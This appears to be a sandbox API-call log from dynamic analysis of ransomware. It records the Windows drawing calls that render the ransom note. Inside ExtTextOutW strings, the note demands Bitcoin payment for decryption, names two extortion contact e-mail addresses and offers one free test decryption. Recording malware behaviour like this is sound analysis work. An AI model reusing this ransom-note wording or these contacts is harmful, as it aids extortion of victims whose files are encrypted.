SetTextColor (hdc=0x14010a11, color=0x2000000) returned 0x2000000 [0113.699] SetBkMode (hdc=0x14010a11, mode=1) returned 1 [0113.699] GetTextAlign (hdc=0x14010a11) returned 0x0 [0113.699] SetTextAlign (hdc=0x14010a11, align=0x18) returned 0x0 [0113.699] _CIatan2 () returned 0x20 [0113.699] _CIatan2 () returned 0x20 [0113.699] ExtTextOutW (hdc=0x14010a11, x=339, y=79, options=0x4, lprect=0x228558, lpString=" roblem with your PC. hould not contain valuable inform￿污ࠀ", c=0x1, lpDx=0x228590) returned 1 [0113.704] SetTextAlign (hdc=0x14010a11, align=0x0) returned 0x18 [0113.704] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.704] LsDestroyLine () returned 0x0 [0113.704] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.704] LsSetDoc () returned 0x0 [0113.704] LsCreateLine () returned 0x0 [0113.704] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.706] LsDisplayLine () returned 0x0 [0113.706] SelectObject (hdc=0x14010a11, h=0x180a09ad) returned 0x180a09ad [0113.706] SetTextColor (hdc=0x14010a11, color=0x2000000) returned 0x2000000 [0113.706] SetBkMode (hdc=0x14010a11, mode=1) returned 1 [0113.706] GetTextAlign (hdc=0x14010a11) returned 0x0 [0113.706] SetTextAlign (hdc=0x14010a11, align=0x18) returned 0x0 [0113.706] _CIatan2 () returned 0x20 [0113.706] _CIatan2 () returned 0x20 [0113.706] ExtTextOutW (hdc=0x14010a11, x=2, y=97, options=0x4, lprect=0x228558, lpString="1) generalchin@countermail.com te us to the e-mail: roblem with your PC. hould not contain valuable inform￿污ࠀ", c=0x2, lpDx=0x228590) returned 1 [0113.706] SetTextAlign (hdc=0x14010a11, align=0x0) returned 0x18 [0113.706] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.706] SelectObject (hdc=0x14010a11, h=0x180a09ad) returned 0x180a09ad [0113.706] SetTextColor (hdc=0x14010a11, color=0x20000ff) returned 0x2000000 [0113.706] SetBkMode (hdc=0x14010a11, mode=1) returned 1 [0113.706] GetTextAlign (hdc=0x14010a11) returned 0x0 [0113.707] SetTextAlign (hdc=0x14010a11, align=0x18) returned 0x0 [0113.707] _CIatan2 () returned 0x20 [0113.707] _CIatan2 () returned 0x20 [0113.707] ExtTextOutW (hdc=0x14010a11, x=16, y=97, options=0x4, lprect=0x228558, lpString=" generalchin@countermail.com te us to the e-mail: roblem with your PC. hould not contain valuable inform￿污ࠀ", c=0x1c, lpDx=0x228590) returned 1 [0113.707] SetTextAlign (hdc=0x14010a11, align=0x0) returned 0x18 [0113.707] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.707] SelectObject (hdc=0x14010a11, h=0x180a09ad) returned 0x180a09ad [0113.707] SetTextColor (hdc=0x14010a11, color=0x2000000) returned 0x20000ff [0113.707] SetBkMode (hdc=0x14010a11, mode=1) returned 1 [0113.707] GetTextAlign (hdc=0x14010a11) returned 0x0 [0113.707] SetTextAlign (hdc=0x14010a11, align=0x18) returned 0x0 [0113.707] _CIatan2 () returned 0x20 [0113.707] _CIatan2 () returned 0x20 [0113.707] ExtTextOutW (hdc=0x14010a11, x=230, y=97, options=0x4, lprect=0x228558, lpString=" te us to the e-mail: roblem with your PC. hould not contain valuable inform￿污ࠀ", c=0x1, lpDx=0x228590) returned 1 [0113.707] SetTextAlign (hdc=0x14010a11, align=0x0) returned 0x18 [0113.707] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.707] SelectObject (hdc=0x14010a11, h=0x180a09ad) returned 0x180a09ad [0113.707] SetTextColor (hdc=0x14010a11, color=0x2000000) returned 0x2000000 [0113.707] SetBkMode (hdc=0x14010a11, mode=1) returned 1 [0113.708] GetTextAlign (hdc=0x14010a11) returned 0x0 [0113.708] SetTextAlign (hdc=0x14010a11, align=0x18) returned 0x0 [0113.708] _CIatan2 () returned 0x20 [0113.708] _CIatan2 () returned 0x20 [0113.708] ExtTextOutW (hdc=0x14010a11, x=234, y=97, options=0x4, lprect=0x228558, lpString=" te us to the e-mail: roblem with your PC. hould not contain valuable inform￿污ࠀ", c=0x1, lpDx=0x228590) returned 1 [0113.708] SetTextAlign (hdc=0x14010a11, align=0x0) returned 0x18 [0113.708] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.708] LsDestroyLine () returned 0x0 [0113.708] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.708] LsSetDoc () returned 0x0 [0113.708] LsCreateLine () returned 0x0 [0113.708] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.710] LsDisplayLine () returned 0x0 [0113.710] SelectObject (hdc=0x14010a11, h=0x180a09ad) returned 0x180a09ad [0113.710] SetTextColor (hdc=0x14010a11, color=0x2000000) returned 0x2000000 [0113.710] SetBkMode (hdc=0x14010a11, mode=1) returned 1 [0113.710] GetTextAlign (hdc=0x14010a11) returned 0x0 [0113.710] SetTextAlign (hdc=0x14010a11, align=0x18) returned 0x0 [0113.710] _CIatan2 () returned 0x20 [0113.710] _CIatan2 () returned 0x20 [0113.710] ExtTextOutW (hdc=0x14010a11, x=2, y=115, options=0x4, lprect=0x228558, lpString="2) generalchin@smime.ninja (if you do not receive a response from the first mailbox) contain valuable inform￿污ࠀ", c=0x2, lpDx=0x228590) returned 1 [0113.710] SetTextAlign (hdc=0x14010a11, align=0x0) returned 0x18 [0113.710] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.710] SelectObject (hdc=0x14010a11, h=0x180a09ad) returned 0x180a09ad [0113.710] SetTextColor (hdc=0x14010a11, color=0x20000ff) returned 0x2000000 [0113.710] SetBkMode (hdc=0x14010a11, mode=1) returned 1 [0113.710] GetTextAlign (hdc=0x14010a11) returned 0x0 [0113.711] SetTextAlign (hdc=0x14010a11, align=0x18) returned 0x0 [0113.711] _CIatan2 () returned 0x20 [0113.711] _CIatan2 () returned 0x20 [0113.711] ExtTextOutW (hdc=0x14010a11, x=16, y=115, options=0x4, lprect=0x228558, lpString=" generalchin@smime.ninja (if you do not receive a response from the first mailbox) contain valuable inform￿污ࠀ", c=0x18, lpDx=0x228590) returned 1 [0113.711] SetTextAlign (hdc=0x14010a11, align=0x0) returned 0x18 [0113.711] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.711] SelectObject (hdc=0x14010a11, h=0x180a09ad) returned 0x180a09ad [0113.711] SetTextColor (hdc=0x14010a11, color=0x2000000) returned 0x20000ff [0113.711] SetBkMode (hdc=0x14010a11, mode=1) returned 1 [0113.711] GetTextAlign (hdc=0x14010a11) returned 0x0 [0113.711] SetTextAlign (hdc=0x14010a11, align=0x18) returned 0x0 [0113.711] _CIatan2 () returned 0x20 [0113.711] _CIatan2 () returned 0x20 [0113.711] ExtTextOutW (hdc=0x14010a11, x=199, y=115, options=0x4, lprect=0x228558, lpString=" (if you do not receive a response from the first mailbox) contain valuable inform￿污ࠀ", c=0x3b, lpDx=0x228590) returned 1 [0113.712] SetTextAlign (hdc=0x14010a11, align=0x0) returned 0x18 [0113.712] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.713] SelectObject (hdc=0x14010a11, h=0x180a09ad) returned 0x180a09ad [0113.713] SetTextColor (hdc=0x14010a11, color=0x2000000) returned 0x2000000 [0113.713] SetBkMode (hdc=0x14010a11, mode=1) returned 1 [0113.713] GetTextAlign (hdc=0x14010a11) returned 0x0 [0113.713] SetTextAlign (hdc=0x14010a11, align=0x18) returned 0x0 [0113.713] _CIatan2 () returned 0x20 [0113.713] _CIatan2 () returned 0x20 [0113.713] ExtTextOutW (hdc=0x14010a11, x=584, y=115, options=0x4, lprect=0x228558, lpString=" contain valuable inform￿污ࠀ", c=0x1, lpDx=0x228590) returned 1 [0113.713] SetTextAlign (hdc=0x14010a11, align=0x0) returned 0x18 [0113.713] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.713] LsDestroyLine () returned 0x0 [0113.713] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.713] LsSetDoc () returned 0x0 [0113.713] LsCreateLine () returned 0x0 [0113.713] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.714] LsDisplayLine () returned 0x0 [0113.714] SelectObject (hdc=0x14010a11, h=0x180a09ad) returned 0x180a09ad [0113.714] SetTextColor (hdc=0x14010a11, color=0x2000000) returned 0x2000000 [0113.714] SetBkMode (hdc=0x14010a11, mode=1) returned 1 [0113.714] GetTextAlign (hdc=0x14010a11) returned 0x0 [0113.714] SetTextAlign (hdc=0x14010a11, align=0x18) returned 0x0 [0113.714] _CIatan2 () returned 0x20 [0113.714] _CIatan2 () returned 0x20 [0113.714] ExtTextOutW (hdc=0x14010a11, x=2, y=133, options=0x4, lprect=0x228558, lpString=" ) generalchin@smime.ninja (if you do not receive a response from the first mailbox) contain valuable inform￿污ࠀ", c=0x1, lpDx=0x228590) returned 1 [0113.714] SetTextAlign (hdc=0x14010a11, align=0x0) returned 0x18 [0113.714] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.714] LsDestroyLine () returned 0x0 [0113.714] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.715] LsSetDoc () returned 0x0 [0113.715] LsCreateLine () returned 0x0 [0113.715] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.715] LsDisplayLine () returned 0x0 [0113.716] SelectObject (hdc=0x14010a11, h=0x180a09ad) returned 0x180a09ad [0113.716] SetTextColor (hdc=0x14010a11, color=0x2000000) returned 0x2000000 [0113.716] SetBkMode (hdc=0x14010a11, mode=1) returned 1 [0113.716] GetTextAlign (hdc=0x14010a11) returned 0x0 [0113.716] SetTextAlign (hdc=0x14010a11, align=0x18) returned 0x0 [0113.716] _CIatan2 () returned 0x20 [0113.716] _CIatan2 () returned 0x20 [0113.716] ExtTextOutW (hdc=0x14010a11, x=2, y=151, options=0x4, lprect=0x228558, lpString="You have to pay for decryption in Bitcoins. The price depends on how fast you write to us. n valuable inform￿污ࠀ", c=0x5b, lpDx=0x228590) returned 1 [0113.716] SetTextAlign (hdc=0x14010a11, align=0x0) returned 0x18 [0113.716] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.716] SelectObject (hdc=0x14010a11, h=0x180a09ad) returned 0x180a09ad [0113.716] SetTextColor (hdc=0x14010a11, color=0x2000000) returned 0x2000000 [0113.716] SetBkMode (hdc=0x14010a11, mode=1) returned 1 [0113.716] GetTextAlign (hdc=0x14010a11) returned 0x0 [0113.716] SetTextAlign (hdc=0x14010a11, align=0x18) returned 0x0 [0113.716] _CIatan2 () returned 0x20 [0113.716] _CIatan2 () returned 0x20 [0113.716] ExtTextOutW (hdc=0x14010a11, x=615, y=151, options=0x4, lprect=0x228558, lpString=" n valuable inform￿污ࠀ", c=0x1, lpDx=0x228590) returned 1 [0113.716] SetTextAlign (hdc=0x14010a11, align=0x0) returned 0x18 [0113.717] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.717] LsDestroyLine () returned 0x0 [0113.717] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.717] SelectObject (hdc=0x14010a11, h=0x18a002e) returned 0x180a09ad [0113.717] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.717] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.717] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.717] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.717] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.717] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.717] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.717] BitBlt (hdc=0x280101d0, x=0, y=2, cx=714, cy=150, hdcSrc=0x14010a11, x1=0, y1=0, rop=0xcc0020) returned 1 [0113.718] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4ac540 | out: hHeap=0x450000) returned 1 [0113.718] DeleteObject (ho=0x1e04024f) returned 1 [0113.718] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x44) returned 0x4ac540 [0113.718] IntersectRect (in: lprcDst=0x229c74, lprcSrc1=0x229c74, lprcSrc2=0x229c44 | out: lprcDst=0x229c74) returned 1 [0113.718] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.718] IntersectRect (in: lprcDst=0x4a1bc0, lprcSrc1=0x4a1bc0, lprcSrc2=0x229b48 | out: lprcDst=0x4a1bc0) returned 1 [0113.718] IntersectRect (in: lprcDst=0x229b48, lprcSrc1=0x229b48, lprcSrc2=0x4a1bd0 | out: lprcDst=0x229b48) returned 1 [0113.718] GetDeviceCaps (hdc=0x14010a11, index=2) returned 1 [0113.718] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x30) returned 0x46d8c0 [0113.718] ExtCreateRegion (lpx=0x0, nCount=0x30, lpData=0x46d8c0) returned 0x42040a7e [0113.718] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x46d8c0 | out: hHeap=0x450000) returned 1 [0113.718] SelectClipRgn (hdc=0x14010a11, hrgn=0x42040a7e) returned 2 [0113.718] DeleteObject (ho=0x42040a7e) returned 1 [0113.718] SelectObject (hdc=0x14010a11, h=0xc01001d9) returned 0x1900010 [0113.718] PatBlt (hdc=0x14010a11, x=2, y=0, w=710, h=138, rop=0xf00021) returned 1 [0113.718] SelectObject (hdc=0x14010a11, h=0x1900010) returned 0xc01001d9 [0113.718] IntersectRect (in: lprcDst=0x4a1bc0, lprcSrc1=0x4a1bc0, lprcSrc2=0x229c64 | out: lprcDst=0x4a1bc0) returned 1 [0113.718] IntersectRect (in: lprcDst=0x4a1bc0, lprcSrc1=0x4a1bc0, lprcSrc2=0x229c84 | out: lprcDst=0x4a1bc0) returned 1 [0113.719] IntersectRect (in: lprcDst=0x22993c, lprcSrc1=0x22993c, lprcSrc2=0x22990c | out: lprcDst=0x22993c) returned 1 [0113.719] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.719] IntersectRect (in: lprcDst=0x4a1bc0, lprcSrc1=0x4a1bc0, lprcSrc2=0x229810 | out: lprcDst=0x4a1bc0) returned 1 [0113.719] IntersectRect (in: lprcDst=0x229810, lprcSrc1=0x229810, lprcSrc2=0x4a1bd0 | out: lprcDst=0x229810) returned 1 [0113.719] GetDeviceCaps (hdc=0x14010a11, index=2) returned 1 [0113.719] IntersectRect (in: lprcDst=0x22960c, lprcSrc1=0x22ef74, lprcSrc2=0x22960c | out: lprcDst=0x22960c) returned 1 [0113.719] SelectObject (hdc=0x14010a11, h=0x7100a7c) returned 0x1900010 [0113.719] GetStockObject (i=8) returned 0x1b00016 [0113.719] SelectObject (hdc=0x14010a11, h=0x1b00016) returned 0x1b00017 [0113.719] GetROP2 (hdc=0x14010a11) returned 13 [0113.719] SetBkMode (hdc=0x14010a11, mode=2) returned 1 [0113.719] Rectangle (hdc=0x14010a11, left=2, top=0, right=713, bottom=139) returned 1 [0113.719] SetBkMode (hdc=0x14010a11, mode=1) returned 2 [0113.719] SelectObject (hdc=0x14010a11, h=0x1b00017) returned 0x1b00016 [0113.719] SelectObject (hdc=0x14010a11, h=0x1900010) returned 0x7100a7c [0113.719] IntersectRect (in: lprcDst=0x4a1bc0, lprcSrc1=0x4a1bc0, lprcSrc2=0x22992c | out: lprcDst=0x4a1bc0) returned 1 [0113.719] IntersectRect (in: lprcDst=0x4a1bc0, lprcSrc1=0x4a1bc0, lprcSrc2=0x22994c | out: lprcDst=0x4a1bc0) returned 1 [0113.719] IntersectRect (in: lprcDst=0x22944c, lprcSrc1=0x22944c, lprcSrc2=0x229300 | out: lprcDst=0x22944c) returned 1 [0113.720] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.720] IntersectRect (in: lprcDst=0x4a1bc0, lprcSrc1=0x4a1bc0, lprcSrc2=0x22944c | out: lprcDst=0x4a1bc0) returned 1 [0113.720] IntersectRect (in: lprcDst=0x2293b0, lprcSrc1=0x2293b0, lprcSrc2=0x4a1bd0 | out: lprcDst=0x2293b0) returned 1 [0113.720] IntersectRect (in: lprcDst=0x4a1bc0, lprcSrc1=0x4a1bc0, lprcSrc2=0x229364 | out: lprcDst=0x4a1bc0) returned 1 [0113.720] GetDeviceCaps (hdc=0x14010a11, index=2) returned 1 [0113.720] SetBkMode (hdc=0x14010a11, mode=1) returned 1 [0113.720] SetTextAlign (hdc=0x14010a11, align=0x0) returned 0x0 [0113.720] LsSetDoc () returned 0x0 [0113.720] LsCreateLine () returned 0x0 [0113.720] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.721] LsDisplayLine () returned 0x0 [0113.721] SelectObject (hdc=0x14010a11, h=0x180a09ad) returned 0x18a002e [0113.721] SetTextColor (hdc=0x14010a11, color=0x2000000) returned 0x2000000 [0113.721] SetBkMode (hdc=0x14010a11, mode=1) returned 1 [0113.721] GetTextAlign (hdc=0x14010a11) returned 0x0 [0113.721] SetTextAlign (hdc=0x14010a11, align=0x18) returned 0x0 [0113.722] _CIatan2 () returned 0x20 [0113.722] _CIatan2 () returned 0x20 [0113.722] ExtTextOutW (hdc=0x14010a11, x=2, y=1, options=0x4, lprect=0x228558, lpString="You have to pay for decryption in Bitcoins. The price depends on how fast you write to us. n valuable inform￿污ࠀ", c=0x5b, lpDx=0x228590) returned 1 [0113.722] SetTextAlign (hdc=0x14010a11, align=0x0) returned 0x18 [0113.722] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.722] SelectObject (hdc=0x14010a11, h=0x180a09ad) returned 0x180a09ad [0113.722] SetTextColor (hdc=0x14010a11, color=0x2000000) returned 0x2000000 [0113.722] SetBkMode (hdc=0x14010a11, mode=1) returned 1 [0113.722] GetTextAlign (hdc=0x14010a11) returned 0x0 [0113.722] SetTextAlign (hdc=0x14010a11, align=0x18) returned 0x0 [0113.722] _CIatan2 () returned 0x20 [0113.722] _CIatan2 () returned 0x20 [0113.722] ExtTextOutW (hdc=0x14010a11, x=615, y=1, options=0x4, lprect=0x228558, lpString=" n valuable inform￿污ࠀ", c=0x1, lpDx=0x228590) returned 1 [0113.722] SetTextAlign (hdc=0x14010a11, align=0x0) returned 0x18 [0113.722] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.722] LsDestroyLine () returned 0x0 [0113.722] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.723] LsSetDoc () returned 0x0 [0113.723] LsCreateLine () returned 0x0 [0113.723] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.723] LsDisplayLine () returned 0x0 [0113.724] SelectObject (hdc=0x14010a11, h=0x180a09ad) returned 0x180a09ad [0113.724] SetTextColor (hdc=0x14010a11, color=0x2000000) returned 0x2000000 [0113.724] SetBkMode (hdc=0x14010a11, mode=1) returned 1 [0113.724] GetTextAlign (hdc=0x14010a11) returned 0x0 [0113.724] SetTextAlign (hdc=0x14010a11, align=0x18) returned 0x0 [0113.724] _CIatan2 () returned 0x20 [0113.724] _CIatan2 () returned 0x20 [0113.724] ExtTextOutW (hdc=0x14010a11, x=2, y=19, options=0x4, lprect=0x228558, lpString="After payment we will send you the decryption tool that will decrypt all your files. us. n valuable inform￿污ࠀ", c=0x55, lpDx=0x228590) returned 1 [0113.724] SetTextAlign (hdc=0x14010a11, align=0x0) returned 0x18 [0113.724] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.725] SelectObject (hdc=0x14010a11, h=0x180a09ad) returned 0x180a09ad [0113.725] SetTextColor (hdc=0x14010a11, color=0x2000000) returned 0x2000000 [0113.725] SetBkMode (hdc=0x14010a11, mode=1) returned 1 [0113.725] GetTextAlign (hdc=0x14010a11) returned 0x0 [0113.725] SetTextAlign (hdc=0x14010a11, align=0x18) returned 0x0 [0113.725] _CIatan2 () returned 0x20 [0113.725] _CIatan2 () returned 0x20 [0113.725] ExtTextOutW (hdc=0x14010a11, x=544, y=19, options=0x4, lprect=0x228558, lpString=" ", c=0x1, lpDx=0x228590) returned 1 [0113.725] SetTextAlign (hdc=0x14010a11, align=0x0) returned 0x18 [0113.725] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.725] LsDestroyLine () returned 0x0 [0113.725] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.725] LsSetDoc () returned 0x0 [0113.725] LsCreateLine () returned 0x0 [0113.726] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.726] LsDisplayLine () returned 0x0 [0113.726] SelectObject (hdc=0x14010a11, h=0x180a09ad) returned 0x180a09ad [0113.726] SetTextColor (hdc=0x14010a11, color=0x2000000) returned 0x2000000 [0113.727] SetBkMode (hdc=0x14010a11, mode=1) returned 1 [0113.727] GetTextAlign (hdc=0x14010a11) returned 0x0 [0113.727] SetTextAlign (hdc=0x14010a11, align=0x18) returned 0x0 [0113.727] _CIatan2 () returned 0x20 [0113.727] _CIatan2 () returned 0x20 [0113.727] ExtTextOutW (hdc=0x14010a11, x=2, y=56, options=0x4, lprect=0x228558, lpString="Free decryption as guarantee the decryption tool that will decrypt all your files. us. n valuable inform￿污ࠀ", c=0x1d, lpDx=0x228590) returned 1 [0113.727] SetTextAlign (hdc=0x14010a11, align=0x0) returned 0x18 [0113.727] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.727] SelectObject (hdc=0x14010a11, h=0x180a09ad) returned 0x180a09ad [0113.728] SetTextColor (hdc=0x14010a11, color=0x2000000) returned 0x2000000 [0113.728] SetBkMode (hdc=0x14010a11, mode=1) returned 1 [0113.728] GetTextAlign (hdc=0x14010a11) returned 0x0 [0113.728] SetTextAlign (hdc=0x14010a11, align=0x18) returned 0x0 [0113.728] _CIatan2 () returned 0x20 [0113.728] _CIatan2 () returned 0x20 [0113.728] ExtTextOutW (hdc=0x14010a11, x=210, y=56, options=0x4, lprect=0x228558, lpString=" the decryption tool that will decrypt all your files. us. n valuable inform￿污ࠀ", c=0x1, lpDx=0x228590) returned 1 [0113.728] SetTextAlign (hdc=0x14010a11, align=0x0) returned 0x18 [0113.728] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.728] LsDestroyLine () returned 0x0 [0113.728] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.728] LsSetDoc () returned 0x0 [0113.728] LsCreateLine () returned 0x0 [0113.728] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.729] LsDisplayLine () returned 0x0 [0113.729] SelectObject (hdc=0x14010a11, h=0x180a09ad) returned 0x180a09ad [0113.729] SetTextColor (hdc=0x14010a11, color=0x2000000) returned 0x2000000 [0113.729] SetBkMode (hdc=0x14010a11, mode=1) returned 1 [0113.729] GetTextAlign (hdc=0x14010a11) returned 0x0 [0113.729] SetTextAlign (hdc=0x14010a11, align=0x18) returned 0x0 [0113.729] _CIatan2 () returned 0x20 [0113.730] _CIatan2 () returned 0x20 [0113.730] ExtTextOutW (hdc=0x14010a11, x=2, y=74, options=0x4, lprect=0x228558, lpString="Before paying you can send us up to 1 files for free decryption. pt all your files. us. n valuable inform￿污ࠀ", c=0x41, lpDx=0x228590) returned 1 [0113.730] SetTextAlign (hdc=0x14010a11, align=0x0) returned 0x18 [0113.730] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.730] SelectObject (hdc=0x14010a11, h=0x180a09ad) returned 0x180a09ad [0113.730] SetTextColor (hdc=0x14010a11, color=0x2000000) returned 0x2000000 [0113.730] SetBkMode (hdc=0x14010a11, mode=1) returned 1 [0113.730] GetTextAlign (hdc=0x14010a11) returned 0x0 [0113.730] SetTextAlign (hdc=0x14010a11, align=0x18) returned 0x0 [0113.730] _CIatan2 () returned 0x20 [0113.730] _CIatan2 () returned 0x20 [0113.730] ExtTextOutW (hdc=0x14010a11, x=434, y=74, options=0x4, lprect=0x228558, lpString=" pt all your files. us. n valuable inform￿污ࠀ", c=0x1, lpDx=0x228590) returned 1 [0113.730] SetTextAlign (hdc=0x14010a11, align=0x0) returned 0x18 [0113.730] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.730] LsDestroyLine () returned 0x0 [0113.730] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.731] LsSetDoc () returned 0x0 [0113.731] LsCreateLine () returned 0x0 [0113.731] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.732] LsDisplayLine () returned 0x0 [0113.732] SelectObject (hdc=0x14010a11, h=0x180a09ad) returned 0x180a09ad [0113.732] SetTextColor (hdc=0x14010a11, color=0x2000000) returned 0x2000000 [0113.732] SetBkMode (hdc=0x14010a11, mode=1) returned 1 [0113.732] GetTextAlign (hdc=0x14010a11) returned 0x0 [0113.732] SetTextAlign (hdc=0x14010a11, align=0x18) returned 0x0 [0113.732] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x258) returned 0x4c8440 [0113.732] _CIatan2 () returned 0x20 [0113.732] _CIatan2 () returned 0x20 [0113.732] ExtTextOutW (hdc=0x14010a11, x=2, y=92, options=0x4, lprect=0x228558, lpString="The total size of files must be less than 500 Kb (non archived), and files should not contain valuable inform￿污ࠀ", c=0x67, lpDx=0x4c8440) returned 1 [0113.733] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4c8440 | out: hHeap=0x450000) returned 1 [0113.733] SetTextAlign (hdc=0x14010a11, align=0x0) returned 0x18 [0113.734] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.734] LsDestroyLine () returned 0x0 [0113.734] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.734] LsSetDoc () returned 0x0 [0113.734] LsCreateLine () returned 0x0 [0113.734] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.735] LsDisplayLine () returned 0x0 [0113.735] SelectObject (hdc=0x14010a11, h=0x180a09ad) returned 0x180a09ad [0113.735] SetTextColor (hdc=0x14010a11, color=0x2000000) returned 0x2000000 [0113.735] SetBkMode (hdc=0x14010a11, mode=1) returned 1 [0113.735] GetTextAlign (hdc=0x14010a11) returned 0x0 [0113.735] SetTextAlign (hdc=0x14010a11, align=0x18) returned 0x0 [0113.735] _CIatan2 () returned 0x20 [0113.735] _CIatan2 () returned 0x20 [0113.735] ExtTextOutW (hdc=0x14010a11, x=2, y=110, options=0x4, lprect=0x228558, lpString="information. (databases, backups, large excel sheets, etc.) d), and files should not contain valuable inform￿污ࠀ", c=0x3c, lpDx=0x228590) returned 1 [0113.735] SetTextAlign (hdc=0x14010a11, align=0x0) returned 0x18 [0113.735] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.736] SelectObject (hdc=0x14010a11, h=0x180a09ad) returned 0x180a09ad [0113.736] SetTextColor (hdc=0x14010a11, color=0x2000000) returned 0x2000000 [0113.736] SetBkMode (hdc=0x14010a11, mode=1) returned 1 [0113.736] GetTextAlign (hdc=0x14010a11) returned 0x0 [0113.736] SetTextAlign (hdc=0x14010a11, align=0x18) returned 0x0 [0113.736] _CIatan2 () returned 0x20 [0113.736] 